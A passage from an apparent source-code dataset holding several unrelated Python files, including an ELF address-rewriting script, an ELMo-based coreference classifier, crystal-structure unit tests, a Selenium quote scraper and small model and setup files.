    elf_fd = open(args.kernel, "rb")
    # Create a modifiable byte stream
    raw_elf = elf_fd.read()
    output = create_string_buffer(raw_elf)
    elf = ELFFile(elf_fd)
    if not elf.has_dwarf_info():
        error("ELF file has no DWARF information")
    if elf.num_segments() == 0:
        error("ELF file has no program header table")
    # Address-space layout comes from linker-provided config symbols.
    syms = extract_all_symbols_from_elf(elf)
    vm_base = syms["CONFIG_KERNEL_VM_BASE"]
    vm_size = syms["CONFIG_KERNEL_VM_SIZE"]
    sram_base = syms["CONFIG_SRAM_BASE_ADDRESS"]
    sram_size = syms["CONFIG_SRAM_SIZE"] * 1024
    vm_offset = syms["CONFIG_KERNEL_VM_OFFSET"]
    sram_offset = syms.get("CONFIG_SRAM_OFFSET", 0)
    #
    # Calculate virtual-to-physical address translation
    #
    virt_to_phys_offset = (sram_base + sram_offset) - (vm_base + vm_offset)
    log("Virtual address space: 0x%x - 0x%x size 0x%x (offset 0x%x)" %
        (vm_base, vm_base + vm_size, vm_size, vm_offset))
    log("Physical address space: 0x%x - 0x%x size 0x%x (offset 0x%x)" %
        (sram_base, sram_base + sram_size, sram_size, sram_offset))
    #
    # Update the entry address in header
    #
    # e_entry is a 32-bit word in ELF32 and a 64-bit word in ELF64.
    if elf.elfclass == 32:
        load_entry_type = "I"
    else:
        load_entry_type = "Q"
    entry_virt = struct.unpack_from(load_entry_type, output, ELF_HDR_ENTRY_OFFSET)[0]
    entry_phys = entry_virt + virt_to_phys_offset
    struct.pack_into(load_entry_type, output, ELF_HDR_ENTRY_OFFSET, entry_phys)
    log("Entry Address: 0x%x -> 0x%x" % (entry_virt, entry_phys))
    #
    # Update load address in program header segments
    #
    # Program header segment offset from beginning of file
    ph_off = elf.header['e_phoff']
    # ph_seg_type: segment type and other fields before virtual address
    # ph_seg_addr: virtual and physical addresses
    # ph_seg_whole: whole segment
    if elf.elfclass == 32:
        # Elf32_Phdr: p_type, p_offset precede p_vaddr/p_paddr.
        ph_seg_type = "II"
        ph_seg_addr = "II"
        ph_seg_whole = "IIIIIIII"
    else:
        # Elf64_Phdr: p_type, p_flags, p_offset precede p_vaddr/p_paddr.
        ph_seg_type = "IIQ"
        ph_seg_addr = "QQ"
        ph_seg_whole = "IIQQQQQQ"
    # Go through all segments
    for ph_idx in range(elf.num_segments()):
        seg_off = ph_off + struct.calcsize(ph_seg_whole) * ph_idx
        # BUGFIX: index [0] instead of tuple unpacking ("seg_type, _ = ...").
        # The 64-bit format "IIQ" yields three values, so the old two-name
        # unpack raised ValueError on any ELF64 input; p_type is always
        # the first field in both classes.
        seg_type = struct.unpack_from(ph_seg_type, output, seg_off)[0]
        # Only process LOAD segments
        if seg_type != 0x01:
            continue
        # Add offset to get to the addresses
        addr_off = seg_off + struct.calcsize(ph_seg_type)
        # Grab virtual and physical addresses
        seg_vaddr, seg_paddr = struct.unpack_from(ph_seg_addr, output, addr_off)
        # Apply virt-to-phys offset so it will load into
        # physical address
        seg_paddr_new = seg_vaddr + virt_to_phys_offset
        log("Segment %d: physical address 0x%x -> 0x%x" % (ph_idx, seg_paddr, seg_paddr_new))
        # Put the addresses back
        struct.pack_into(ph_seg_addr, output, addr_off, seg_vaddr, seg_paddr_new)
    out_fd = open(args.output, "wb")
    out_fd.write(output)
    out_fd.close()
    elf_fd.close()
# Script entry point (no effect on import).
if __name__ == "__main__":
    main()
| 29.403226 | 93 | 0.671786 |
ace735ebf161b118ef3d6642d5fc963af3d198d5 | 112 | py | Python | tests/integration/docusaurus/template/script_example.py | victorcouste/great_expectations | 9ee46d83feb87e13c769e2ae35b899b3f18d73a4 | [
"Apache-2.0"
] | 6,451 | 2017-09-11T16:32:53.000Z | 2022-03-31T23:27:49.000Z | tests/integration/docusaurus/template/script_example.py | victorcouste/great_expectations | 9ee46d83feb87e13c769e2ae35b899b3f18d73a4 | [
"Apache-2.0"
] | 3,892 | 2017-09-08T18:57:50.000Z | 2022-03-31T23:15:20.000Z | tests/integration/docusaurus/template/script_example.py | victorcouste/great_expectations | 9ee46d83feb87e13c769e2ae35b899b3f18d73a4 | [
"Apache-2.0"
] | 1,023 | 2017-09-08T15:22:05.000Z | 2022-03-31T21:17:08.000Z | import os
from ruamel import yaml
import great_expectations as ge
context = ge.get_context()
assert context
| 11.2 | 31 | 0.794643 |
ace7368b03bb987aca6bcdbbc047dfc01a45f300 | 8,317 | py | Python | frozen_model/scripts/elmo_mlp_model.py | Yorko/gender-unbiased_BERT-based_pronoun_resolution | 67d8c6b3fce94bbeb75bbc644a3111b168e7c25b | [
"Apache-2.0"
] | 47 | 2019-05-21T06:30:36.000Z | 2022-02-18T08:35:13.000Z | frozen_model/scripts/elmo_mlp_model.py | Yorko/gender-unbiased_BERT-based_pronoun_resolution | 67d8c6b3fce94bbeb75bbc644a3111b168e7c25b | [
"Apache-2.0"
] | 1 | 2022-01-12T17:40:19.000Z | 2022-01-13T10:50:17.000Z | frozen_model/scripts/elmo_mlp_model.py | Yorko/gender-unbiased_BERT-based_pronoun_resolution | 67d8c6b3fce94bbeb75bbc644a3111b168e7c25b | [
"Apache-2.0"
] | 6 | 2019-08-12T16:10:52.000Z | 2021-11-15T08:44:31.000Z | '''
Before running, download the files:
"https://s3-us-west-2.amazonaws.com/allennlp/models/elmo/2x4096_512_2048cnn_2xhighway/elmo_2x4096_512_2048cnn_2xhighway_options.json"
"https://s3-us-west-2.amazonaws.com/allennlp/models/elmo/2x4096_512_2048cnn_2xhighway/elmo_2x4096_512_2048cnn_2xhighway_weights.hdf5"
and place them in the folder:
../models/elmo
Requires 2.0.11 <= spacy <= 2.0.18
I ran into an issue using allennlp 0.8.3:
conflict caused by a folder and a file with
the same name "wikitable", located in
.local/lib/python3.6/site-packages/allennlp/data/dataset_readers/semantic_parsing
Tried different versions of allennlp, which created other problems.
To solve the conflict, I kept allennlp 0.8.3 and manually changed the name of the folder.
Let me know if you find a better solution.
To run ELMo on GPU, add parameter cuda_device = 0 to ElmoEmbedder
'''
import numpy as np, pandas as pd
import os
import zipfile
import sys
import time
import pickle
from allennlp.commands.elmo import ElmoEmbedder
from allennlp.data.tokenizers import word_tokenizer
from sklearn.model_selection import cross_val_score, KFold, train_test_split
from sklearn.metrics import log_loss
from keras import backend, models, layers, initializers, regularizers, constraints, optimizers
from keras import callbacks as kc
from keras import optimizers as ko
INPUT_PATH = "input/"
FEATURE_PATH = "features/"
MODEL_PATH = "models/elmo/"
TRAIN_FILE_PATH = INPUT_PATH + "train.tsv"
TEST_FILE_PATH = INPUT_PATH + "test.tsv" # modify this path for stage 2
dense_layer_sizes = [37]
dropout_rate = 0.6
learning_rate = 0.001
n_fold = 5
batch_size = 32
epochs = 1000
patience = 100
lambd = 0.1 # L2 regularization
def get_elmo_fea(data, op, wg):
'''
Took this method from public kernel:
https://www.kaggle.com/wochidadonggua/elmo-baseline
modified it to concatenate all 3 layers
'''
def get_nearest(slot, target):
for i in range(target, -1, -1):
if i in slot:
return i
# add parameter cuda_device=0 to use GPU
elmo = ElmoEmbedder(options_file=op, weight_file=wg)
tk = word_tokenizer.WordTokenizer()
tokens = tk.batch_tokenize(data.Text)
idx = []
for i in range(len(tokens)):
idx.append([x.idx for x in tokens[i]])
tokens[i] = [x.text for x in tokens[i]]
vectors = elmo.embed_sentences(tokens)
ans = []
for i, vector in enumerate([v for v in vectors]):
P_l = data.iloc[i].Pronoun
A_l = data.iloc[i].A.split()
B_l = data.iloc[i].B.split()
P_offset = data.iloc[i]['Pronoun-offset']
A_offset = data.iloc[i]['A-offset']
B_offset = data.iloc[i]['B-offset']
if P_offset not in idx[i]:
P_offset = get_nearest(idx[i], P_offset)
if A_offset not in idx[i]:
A_offset = get_nearest(idx[i], A_offset)
if B_offset not in idx[i]:
B_offset = get_nearest(idx[i], B_offset)
# P is a single token. For A and B, average over tokens in the span.
emb_P = vector[:, idx[i].index(P_offset), :]
emb_A = np.mean(vector[:, idx[i].index(A_offset):idx[i].index(A_offset) + len(A_l), :], axis=1)
emb_B = np.mean(vector[:, idx[i].index(B_offset):idx[i].index(B_offset) + len(B_l), :], axis=1)
ans.append(np.concatenate([emb_A[0], emb_A[1], emb_A[2], emb_B[0], emb_B[1], emb_B[2],
emb_P[0], emb_P[1], emb_P[2]], axis=0).reshape(1, -1))
emb = np.concatenate(ans, axis=0)
return emb
def build_mlp_model(input_shape, seed):
    """Build the (uncompiled) Keras MLP classifier: one hidden dense layer
    with batch-norm/ReLU/dropout, then a 3-way softmax output.

    input_shape: shape list for the input layer (feature dimension).
    seed: seed for the glorot initializers and dropout, so each CV fold
    is reproducible.
    """
    X_input = layers.Input(input_shape)
    # First dense layer
    X = layers.Dense(dense_layer_sizes[0], name='dense0', kernel_initializer=initializers.glorot_uniform(seed=seed))(
        X_input)
    X = layers.BatchNormalization(name='bn0')(X)
    X = layers.Activation('relu')(X)
    X = layers.Dropout(dropout_rate, seed=seed)(X)
    # Second dense layer
    # (kept for experimentation; one hidden layer performed better)
    # X = layers.Dense(dense_layer_sizes[0], name = 'dense1', kernel_initializer=initializers.glorot_uniform(seed=seed))(X)
    # X = layers.BatchNormalization(name = 'bn1')(X)
    # X = layers.Activation('relu')(X)
    # X = layers.Dropout(dropout_rate, seed = seed)(X)
    # Output layer: 3 classes (A, B, NEITHER) with L2 regularization.
    X = layers.Dense(3, name='output', kernel_regularizer=regularizers.l2(lambd),
                     kernel_initializer=initializers.glorot_uniform(seed=seed))(X)
    X = layers.Activation('softmax')(X)
    # Create model
    model = models.Model(input=X_input, output=X, name="classif_model")
    return model
def build_elmo_embeddings():
    """Embed the test and train GAP data with ELMo and cache each as CSV."""
    options_path = MODEL_PATH + "elmo_2x4096_512_2048cnn_2xhighway_options.json"
    weights_path = MODEL_PATH + "elmo_2x4096_512_2048cnn_2xhighway_weights.hdf5"
    print("Started at ", time.ctime())
    # Test split first, then train split (same order as before).
    features = {}
    for split, path in (("test", TEST_FILE_PATH), ("train", TRAIN_FILE_PATH)):
        frame = pd.read_csv(path, sep='\t')
        features[split] = get_elmo_fea(frame, options_path, weights_path)
    print("Finished at ", time.ctime())
    pd.DataFrame(features["train"]).to_csv(FEATURE_PATH + "train_elmo_embedding.csv", index=False)
    pd.DataFrame(features["test"]).to_csv(FEATURE_PATH + "test_elmo_embedding.csv", index=False)
def get_labels_for_elmo():
    """Build one-hot labels (columns: A, B, NEITHER) for the training set."""
    train = pd.read_csv(TRAIN_FILE_PATH, sep='\t')
    labels = np.zeros((len(train), 3))
    for row_idx, (a_coref, b_coref) in enumerate(zip(train["A-coref"], train["B-coref"])):
        if a_coref:
            labels[row_idx, 0] = 1
        elif b_coref:
            labels[row_idx, 1] = 1
        else:
            labels[row_idx, 2] = 1
    return labels
def train_elmo_mlp_model(test=False):
    '''
    Runs 5-fold CV and blending over 3 seed values
    Simple MLP architecture: 1 hidden layer seems to work better than 2

    Reads cached ELMo embeddings from FEATURE_PATH, trains one MLP per
    (seed, fold) combination, and writes averaged out-of-fold and test
    probabilities to FEATURE_PATH as TSV files.
    '''
    # NOTE(review): the `test` parameter is unused; kept for interface
    # compatibility with callers.
    # Read the embeddings from file
    X_train = pd.read_csv(FEATURE_PATH + "train_elmo_embedding.csv").values
    X_test = pd.read_csv(FEATURE_PATH + "test_elmo_embedding.csv").values
    # Get the labels to train the MLP model
    Y_train = get_labels_for_elmo()
    # Initializing the predictions
    prediction = np.zeros((len(X_test), 3))
    oof = np.zeros((len(X_train), 3))
    # Training and cross-validation
    scores = []
    seed_list = [1, 6003, 10000007]
    for seed in seed_list:
        folds = KFold(n_splits=n_fold, shuffle=True, random_state=seed)
        for fold_n, (train_index, valid_index) in enumerate(folds.split(X_train)):
            # split training and validation data
            print('Fold', fold_n, 'started at', time.ctime())
            X_tr, X_val = X_train[train_index], X_train[valid_index]
            Y_tr, Y_val = Y_train[train_index], Y_train[valid_index]
            # Define the model, re-initializing for each fold
            classif_model = build_mlp_model([X_train.shape[1]], seed)
            classif_model.compile(optimizer=optimizers.Adam(lr=learning_rate),
                                  loss="categorical_crossentropy")
            callbacks = [kc.EarlyStopping(monitor='val_loss', patience=patience,
                                          restore_best_weights=True)]
            # train the model
            classif_model.fit(x=X_tr, y=Y_tr, epochs=epochs, batch_size=batch_size,
                              callbacks=callbacks, validation_data=(X_val, Y_val), verbose=0)
            # make predictions on validation and test data
            pred_valid = classif_model.predict(x=X_val, verbose=0)
            pred = classif_model.predict(x=X_test, verbose=0)
            scores.append(log_loss(Y_val, pred_valid))
            prediction += pred
            oof[valid_index] += pred_valid
    # Average: test preds over all seed*fold models; OOF preds over seeds
    # (each sample appears in exactly one validation fold per seed).
    prediction /= n_fold * len(seed_list)
    oof /= len(seed_list)
    # Print CV scores, as well as score on the test data
    print('CV mean score: {0:.4f}, std: {1:.4f}.'.format(np.mean(scores), np.std(scores)))
    print(scores)
    # print("Test score:", log_loss(Y_test,prediction))
    df_pred = pd.DataFrame(prediction, columns=["elmo_A", "elmo_B", "elmo_N"]).round(4)
    df_oof = pd.DataFrame(oof, columns=["elmo_A", "elmo_B", "elmo_N"]).round(4)
    df_oof.to_csv(FEATURE_PATH + "train_elmo_prob.tsv", sep='\t')
    df_pred.to_csv(FEATURE_PATH + "test_elmo_prob.tsv", sep='\t')
def build_train_elmo():
    """End-to-end pipeline: compute/cache ELMo embeddings, then train the MLP."""
    build_elmo_embeddings()
    train_elmo_mlp_model()
| 34.945378 | 133 | 0.665144 |
ace73748db208666a98e75b2e930971dd982528e | 443 | py | Python | tests/test_case.py | blackacornlabs/marshmallow_extended | 0cda702d65c850044ff58f00f4eb29d2969077d0 | [
"MIT"
] | null | null | null | tests/test_case.py | blackacornlabs/marshmallow_extended | 0cda702d65c850044ff58f00f4eb29d2969077d0 | [
"MIT"
] | null | null | null | tests/test_case.py | blackacornlabs/marshmallow_extended | 0cda702d65c850044ff58f00f4eb29d2969077d0 | [
"MIT"
] | null | null | null | from os import getenv
from unittest import TestCase
from dotenv import load_dotenv
from mongoengine import connect
load_dotenv()
class CommonTestCase(TestCase):
    """Base TestCase that provisions a clean MongoDB connection per class.

    Connects using the MONGODB_HOST environment variable and drops any
    pre-existing 'test' database so each test class starts from scratch.
    """
    # Shared mongoengine connection, populated in setUpClass.
    db = None

    @classmethod
    def setUpClass(cls) -> None:
        cls.db = connect(host=getenv("MONGODB_HOST"))
        if 'test' in cls.db.list_database_names():
            cls.db.drop_database('test')

    @classmethod
    def tearDownClass(cls) -> None:
        # Intentionally empty: a dirty 'test' database is dropped by the
        # next setUpClass run instead.
        pass
| 20.136364 | 53 | 0.677201 |
ace7374a61f09cc58d42b8c646349b58e0b14821 | 771 | py | Python | pystrand/loggers/csv_logger.py | jpodivin/pystrand | b707892c188379c64694f67a5c3e01e52c4618f7 | [
"BSD-3-Clause"
] | null | null | null | pystrand/loggers/csv_logger.py | jpodivin/pystrand | b707892c188379c64694f67a5c3e01e52c4618f7 | [
"BSD-3-Clause"
] | 2 | 2021-03-14T13:57:06.000Z | 2021-12-28T16:53:02.000Z | pystrand/loggers/csv_logger.py | jpodivin/pystrand | b707892c188379c64694f67a5c3e01e52c4618f7 | [
"BSD-3-Clause"
] | null | null | null | import os
import pandas as pd
from pystrand.loggers.base import BaseLogger
class CsvLogger(BaseLogger):
    """Uses pandas Dataframe to process history
    and store it as a csv.
    """

    def save_history(self, data, run_id):
        """Save run history as csv file with name consisting of prefix
        set during the __init__ call and a id hash of the data object.

        data: anything accepted by the pandas.DataFrame constructor.
        run_id: identifier embedded in the log file name.
        Raises PermissionError if denied access.
        """
        log_file_name = "{0}_{1}.log".format(
            self.log_file_name,
            run_id)
        path_to_file = os.path.join(self.log_path, log_file_name)
        log = pd.DataFrame(data=data)
        try:
            log.to_csv(path_or_buf=path_to_file)
        except PermissionError:
            # BUGFIX: re-raise the original exception instead of raising a
            # fresh, empty PermissionError() — the original carries the
            # errno, message and traceback context the caller needs.
            raise
| 26.586207 | 70 | 0.639429 |
ace737aff158fe92da4e3b29bf728baa644fcae9 | 8,403 | py | Python | tests/test_base.py | priyankism/crystals | 683bf35fbc95d0ded8cafdad0f2dede7adf5b072 | [
"BSD-3-Clause"
] | null | null | null | tests/test_base.py | priyankism/crystals | 683bf35fbc95d0ded8cafdad0f2dede7adf5b072 | [
"BSD-3-Clause"
] | null | null | null | tests/test_base.py | priyankism/crystals | 683bf35fbc95d0ded8cafdad0f2dede7adf5b072 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
import collections.abc as abc
import pickle
import unittest
from copy import deepcopy
from itertools import islice
import numpy as np
from crystals import Atom, AtomicStructure, Crystal
np.random.seed(23)
class TestAtomicStructure(unittest.TestCase):
def setUp(self):
self.substructure = AtomicStructure(atoms=[Atom("U", [0, 0, 0])])
self.structure = AtomicStructure(
atoms=[Atom("Ag", [0, 0, 0]), Atom("Ag", [1, 1, 1])],
substructures=[self.substructure],
)
def test_iteration(self):
""" Test iteration of AtomicStructure yields from orphan atoms and substructure atoms alike """
elements = [atm.element for atm in self.structure]
self.assertTrue(len(elements), 3)
def test_addition_trivial(self):
""" Test that the addition of two AtomicStructures, one being empty, works as expected """
addition = self.structure + AtomicStructure()
self.assertEqual(addition, self.structure)
self.assertIsNot(addition, self.structure)
def test_addition_uniqueness(self):
""" Test that the addition of two AtomicStructures, works as expected regarding unique atoms """
self.assertEqual(self.structure + self.structure, self.structure)
def test_addition(self):
""" Test the addition of two different AtomicStructures works as expected. """
new_struct = AtomicStructure(
atoms=[Atom("U", [0, 1, 0])],
substructures=[
AtomicStructure(
atoms=[Atom("Ag", [0.5, 0, 0]), Atom("Ag", [1, 0.3, 1])]
)
],
)
addition = self.structure + new_struct
self.assertEqual(len(new_struct) + len(self.structure), len(addition))
self.assertEqual(
len(new_struct.atoms) + len(self.structure.atoms), len(addition.atoms)
)
self.assertEqual(
len(new_struct.substructures) + len(self.structure.substructures),
len(addition.substructures),
)
def test_addition_subclasses(self):
""" Test that the addition of two subclass of AtomicStructures is preserved under addition. """
class NewAtomicStructure(AtomicStructure):
pass
addition = NewAtomicStructure() + NewAtomicStructure()
self.assertIs(type(addition), NewAtomicStructure)
def test_truthiness(self):
""" Test that empty AtomicStructures are falsey, and truthy otherwise. """
empty_structure = AtomicStructure()
self.assertFalse(empty_structure)
self.assertTrue(self.structure)
def test_trivial_transformation(self):
""" Test that the identity transformation of an AtomicStructure works as expected. """
transformed = self.structure.transform(np.eye(3))
# transformed structure should be different, but equal, to original structure
self.assertIsNot(transformed, self.structure)
self.assertEqual(transformed, self.structure)
def test_transformations_inversions(self):
""" Test that symmetry operations work as expected when inverted. """
operator = np.random.random(size=(3, 3))
inv_op = np.linalg.inv(operator)
transformed1 = self.structure.transform(operator)
transformed2 = transformed1.transform(inv_op)
# transformed2 structure should be different, but equal, to original structure
self.assertIsNot(transformed2, self.structure)
self.assertEqual(transformed2, self.structure)
def test_transform_subclass(self):
""" Test that the object returned by the transform() method is the
same class as the method caller. """
class NewAtomicStructure(AtomicStructure):
pass
structure = NewAtomicStructure(
atoms=[Atom("Ag", [0, 0, 0]), Atom("Ag", [1, 1, 1])]
)
transformed = structure.transform(np.eye(3))
self.assertIs(type(transformed), type(structure))
def test_transformations_correctness(self):
""" Test that AtomicStructure.transform() works as expected. """
operator = 2 * np.eye(3)
transformed = self.structure.transform(operator)
expected_atoms = [atm.transform(operator) for atm in self.structure]
for atm in expected_atoms:
self.assertIn(atm, transformed)
def test_itersorted(self):
""" Test that AtomicStructure.itersorted() works as expected """
sorted_from_structure = list(self.structure.itersorted())
sorted_from_list = list(sorted(self.structure, key=lambda a: a.element))
self.assertListEqual(sorted_from_structure, sorted_from_list)
def test_chemical_composition_trivial(self):
""" Test that AtomicStructure.chemical_composition works as expected """
expected = {"U": 1 / 3, "Ag": 2 / 3}
self.assertDictEqual(self.structure.chemical_composition, expected)
def test_chemical_composition_add_to_unity(self):
""" Test that AtomicStructure.chemical_composition always adds up to 1 """
# Faster to create a large atomic structure from a Crystal object
# Testing for 10 crystal structures only
for name in islice(Crystal.builtins, 10):
with self.subTest("Chemical composition: " + name):
structure = AtomicStructure(atoms=Crystal.from_database(name))
self.assertAlmostEqual(sum(structure.chemical_composition.values()), 1)
def test_chemical_formula(self):
""" Test that AtomicStructure.chemical_formula is working as expected. """
self.assertEqual(self.structure.chemical_formula, "Ag2 U")
def test_chemical_formula_hill_notation(self):
""" Test that the Hill notation, where elements are alphabetically ordered except C and H, which are first. """
structure = AtomicStructure(
atoms=[
Atom("Ag", [0, 1, 0]),
Atom("C", [0, 0, 0]),
Atom("H", [0, 1, 0]),
Atom("U", [1, 1, 1]),
]
)
self.assertEqual(structure.chemical_formula, "C H Ag U")
def test_length(self):
""" Test the __len__ methods """
self.assertTrue(len(self.structure), 3)
def test_containership_substructures(self):
""" Test that containership works on substructure and atoms separately """
self.assertIn(self.substructure, self.structure)
self.assertNotIn(self.structure, self.substructure)
def test_containership_atoms(self):
""" Test that atom containership testing is working, even in substructures """
atm = next(iter(self.substructure))
self.assertIn(atm, self.structure)
def test_equality(self):
""" Test that AtomicStructure is equal to itself but not others """
self.assertEqual(self.structure, self.structure)
self.assertEqual(self.structure, deepcopy(self.structure))
self.assertNotEqual(self.structure, self.substructure)
# Special case: make structures from Crystals
c1 = Crystal.from_database("vo2-m1")
c2 = deepcopy(c1)
s1 = AtomicStructure(atoms=c1)
s2 = AtomicStructure(atoms=c2.atoms)
self.assertEqual(s1, s2)
def test_array(self):
""" Test AtomicStructure.__array__ """
arr = np.array(self.structure)
self.assertSequenceEqual(arr.shape, (len(self.structure), 4))
def test_picklable(self):
""" Test that Crystal instances can be pickled, and that the unpickled instance
is identical to the source """
pickled = pickle.dumps(self.structure)
unpickled = pickle.loads(pickled)
self.assertEqual(self.structure, unpickled)
    def test_abstract_base_classes(self):
        """ Test that AtomicStructure fits with collections.abc module """
        # The structure should satisfy the Hashable, Iterable and Sized
        # protocols from collections.abc.
        for abstract_base_class in (abc.Hashable, abc.Iterable, abc.Sized):
            self.assertIsInstance(self.structure, abstract_base_class)
    def test_satisfying(self):
        """ Test the AtomicStructure.satisfying method """
        # satisfying() filters atoms by predicate; the fixture holds
        # 1 uranium atom and 2 silver atoms.
        uranium = self.structure.satisfying(lambda a: a.element == "U")
        silver = self.structure.satisfying(lambda a: a.element == "Ag")
        self.assertEqual(len(uranium), 1)
        self.assertEqual(len(silver), 2)
if __name__ == "__main__":
    # Run the test suite when this module is executed directly.
    unittest.main()
| 39.636792 | 119 | 0.655361 |
ace737d85d7158b4a2038276c09d73768e6eb1dc | 1,698 | py | Python | examples/selenium/any_io/quotes_to_scrape.py | lewoudar/scalpel | 455a3ff766c91d02f33957ea17f1cfbec141ab60 | [
"Apache-2.0"
] | 15 | 2020-11-02T21:11:03.000Z | 2022-03-10T14:17:46.000Z | examples/selenium/any_io/quotes_to_scrape.py | lewoudar/scalpel | 455a3ff766c91d02f33957ea17f1cfbec141ab60 | [
"Apache-2.0"
] | 4 | 2020-11-01T17:54:15.000Z | 2022-03-04T21:42:41.000Z | examples/selenium/any_io/quotes_to_scrape.py | lewoudar/scalpel | 455a3ff766c91d02f33957ea17f1cfbec141ab60 | [
"Apache-2.0"
] | 2 | 2021-05-01T06:59:12.000Z | 2021-11-25T07:01:02.000Z | """Simple example to show usage of anyio SeleniumSpider class"""
from datetime import datetime
from pathlib import Path
import anyio
from selenium.common.exceptions import NoSuchElementException
from scalpel import Configuration, datetime_decoder
from scalpel.any_io import SeleniumSpider, SeleniumResponse, read_mp
async def parse(spider: SeleniumSpider, response: SeleniumResponse) -> None:
    """Scrape every quote on the current page and queue the next page.

    For each ``div.quote`` element the quote text, author and tag list are
    saved as one item via the spider; if a "next" pagination link exists,
    it is followed.
    """
    for quote_tag in response.driver.find_elements_by_xpath('//div[@class="quote"]'):
        await spider.save_item({
            'quote': quote_tag.find_element_by_xpath('./span[@class="text"]').text,
            'author': quote_tag.find_element_by_xpath('./span/small').text,
            'tags': [item.text for item in quote_tag.find_elements_by_xpath('./div/a')]
        })
    next_link = None
    try:
        # The "next" button is absent on the last page, in which case
        # Selenium raises NoSuchElementException -- treated as "done".
        element = response.driver.find_element_by_xpath('//nav/ul/li[@class="next"]/a')
        next_link = element.get_attribute('href')
    except NoSuchElementException:
        pass
    if next_link is not None:
        await response.follow(next_link)
def date_processor(item: dict) -> dict:
    """Item processor that stamps each scraped item with the current time.

    Mutates *item* in place (adds a ``date`` key) and returns it so it can
    be chained with other processors.
    """
    item.update(date=datetime.now())
    return item
async def main() -> None:
    """Run the spider against quotes.toscrape.com and print the results."""
    backup = Path(__file__).parent / 'backup.mp'
    # Disable the selenium driver log file and register the date-stamping
    # item processor; scraped items are persisted to the msgpack backup.
    config = Configuration(selenium_driver_log_file=None, backup_filename=f'{backup}', item_processors=[date_processor])
    spider = SeleniumSpider(urls=['http://quotes.toscrape.com'], parse=parse, config=config)
    await spider.run()
    print(spider.statistics())
    # you can do whatever you want with the results
    # (datetime_decoder restores the datetime added by date_processor)
    async for quote in read_mp(filename=backup, decoder=datetime_decoder):
        print(quote)
if __name__ == '__main__':
anyio.run(main)
| 34.653061 | 120 | 0.707303 |
ace737e4f16d442aae1d1a53a7a45a0b848373bc | 1,045 | py | Python | gram/migrations/0001_initial.py | maxwaiyaki/instagram | bc203c9dbba0563bb979003624852ccf30fd6325 | [
"MIT"
] | null | null | null | gram/migrations/0001_initial.py | maxwaiyaki/instagram | bc203c9dbba0563bb979003624852ccf30fd6325 | [
"MIT"
] | null | null | null | gram/migrations/0001_initial.py | maxwaiyaki/instagram | bc203c9dbba0563bb979003624852ccf30fd6325 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2018-12-14 15:17
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    # Auto-generated by Django 1.11 (see header); creates the initial
    # Profile model. NOTE: applied migrations should not be edited by hand.

    initial = True

    dependencies = [
        # Profile links to the configured (swappable) user model below.
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
    ]

    operations = [
        migrations.CreateModel(
            name='Profile',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('profile_picture', models.ImageField(blank=True, upload_to='profile_pictures/')),
                ('bio', models.TextField(blank=True, max_length=100)),
                ('followers', models.ManyToManyField(blank=True, related_name='followers', to=settings.AUTH_USER_MODEL)),
                ('user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
        ),
    ]
ace737f8ca6072ff48b77b60f1002ab377e9aeb3 | 586 | py | Python | FapgansControleBot/Models/gans.py | slaapyhoofd/Fapganscontrolebot | 9c5b502e4b69a0f70260b94b0d8f8b88f24cbc09 | [
"MIT"
] | null | null | null | FapgansControleBot/Models/gans.py | slaapyhoofd/Fapganscontrolebot | 9c5b502e4b69a0f70260b94b0d8f8b88f24cbc09 | [
"MIT"
] | null | null | null | FapgansControleBot/Models/gans.py | slaapyhoofd/Fapganscontrolebot | 9c5b502e4b69a0f70260b94b0d8f8b88f24cbc09 | [
"MIT"
] | null | null | null | import datetime
from sqlalchemy import Column, Integer, String, DateTime, ForeignKey
from sqlalchemy.orm import relationship
from FapgansControleBot.Repository.database import Base
class Gans(Base):
    """SQLAlchemy model recording a single 'gans' event for a user."""
    __tablename__ = 'gans'

    gans_id = Column(Integer, primary_key=True)
    user_id = Column(ForeignKey('users.user_id'))
    credit_id = Column(ForeignKey('credits.credit_id'))
    # Timestamp of the event; set to UTC at construction time (naive).
    date = Column(DateTime)

    user = relationship("User", back_populates="ganzen")

    def __init__(self, user_id: int):
        self.user_id = user_id
        # NOTE(review): utcnow() returns a *naive* datetime and is
        # deprecated in Python 3.12+; consider datetime.now(timezone.utc).
        self.date = datetime.datetime.utcnow()
ace7383fa63b4e946899e979d3c82f76723d3613 | 612 | py | Python | setup.py | asulibraries/django-historicalrecords | 168cea823f757425e694f4890e82871e783e12e5 | [
"BSD-3-Clause"
] | null | null | null | setup.py | asulibraries/django-historicalrecords | 168cea823f757425e694f4890e82871e783e12e5 | [
"BSD-3-Clause"
] | null | null | null | setup.py | asulibraries/django-historicalrecords | 168cea823f757425e694f4890e82871e783e12e5 | [
"BSD-3-Clause"
] | null | null | null | from setuptools import setup, find_packages
def listify(filename):
    """Read *filename* and return its non-empty lines as a list.

    Fixes two issues with the original one-liner: the file handle was
    never closed (resource leak), and on Python 3 ``filter`` returned a
    one-shot lazy iterator rather than a list setuptools can re-iterate.
    """
    with open(filename, 'r') as fh:
        return [line for line in fh.read().split('\n') if line]
# Standard setuptools metadata; install requirements and trove classifiers
# are read from sibling text files via listify().
setup(
    name = "django-historicalrecords",
    version = "1.0",
    url = 'http://github.com/smn/django-historicalrecords',
    license = 'BSD',
    description = "Marty Alchin's HistoricalRecords from the ProDjango book.",
    long_description = open('README.rst','r').read(),
    author = 'Marty Alchin',
    packages = find_packages('src'),
    package_dir = {'': 'src'},
    install_requires = listify('requirements.pip'),
    classifiers = listify('CLASSIFIERS.txt'),
)
ace7391ddfe6e02b92dc19a4327b5ee19bdb9cee | 6,413 | py | Python | BirdsEyePerspectiveTransformationUtility.py | hellkrusher/BirdsEyePerspectiveTransformationUtility | bc3ab746e2358d04f13e45cf8c714a5c61a7e9a7 | [
"MIT"
] | 3 | 2021-08-29T19:42:10.000Z | 2022-03-18T10:33:55.000Z | BirdsEyePerspectiveTransformationUtility.py | hellkrusher/BirdsEyePerspectiveTransformationUtility | bc3ab746e2358d04f13e45cf8c714a5c61a7e9a7 | [
"MIT"
